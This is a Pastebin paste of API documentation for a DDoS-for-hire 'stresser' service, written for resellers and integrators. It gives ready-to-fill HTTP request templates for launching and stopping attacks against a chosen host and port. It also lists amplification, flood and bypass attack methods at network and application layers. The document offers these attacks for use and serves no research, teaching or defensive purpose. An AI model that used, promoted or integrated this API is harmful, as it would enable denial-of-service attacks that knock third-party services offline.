bootssads

DDOS ATTACK API 2024

Feb 22nd, 2024
240
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. API Documentation
  2.  
  3. Introduction
  4. API is useful if you wish to resell Nightmarestresser or implement it into your own software without logging in through the web panel, all that is needed is a simple HTTP GET request to launch and stop ddos attack.
  5.  
  6. Your private API key can be found HERE: https://nightmarestresser.net/source/profile.php
  7.  
  8. Send Attack
  9. https://api.nightmarestresser.net/?key=[KEY]&method=[METHOD]&host=[HOST]&port=[PORT]&time=[TIME]&concurrents=[CONCURRENTS]
  10.  
  11. Stop Attack
  12. https://api.nightmarestresser.net/?key=[KEY]&method=STOP&host=[HOST]&port=[PORT]&time=[TIME]&concurrents=[CONCURRENTS]
  13. Note: Host, port and time must match what was sent initially
  14.  
  15. Stop All Attacks
  16. https://api.nightmarestresser.net/?key=[KEY]&method=STOPALL
  17.  
  18. Layer 4 Methods
  19. NTPv2, DNS, ARD, WSD, TCP-BYPASS, TCP-CONNECT, MINECRAFT, FIVEM, SOURCE, UDP-AMP, SSDP, DVR, SNMP, CHARGEN, TCP-AMP, TCP-DETECT, TCP-BOUNCE, ICMP-AMP, UDP-BANIP, UDP-BYPASS, RAKNET, TCP-SYN, TCP-ACK, TCP-RAND
  20.  
  21. Layer 7 Methods
  22. AUTO-BYPASS, BYPASSv2, SOCKET-SPAM, HTTP-SPAMMER
Add Comment
Please, Sign In to add comment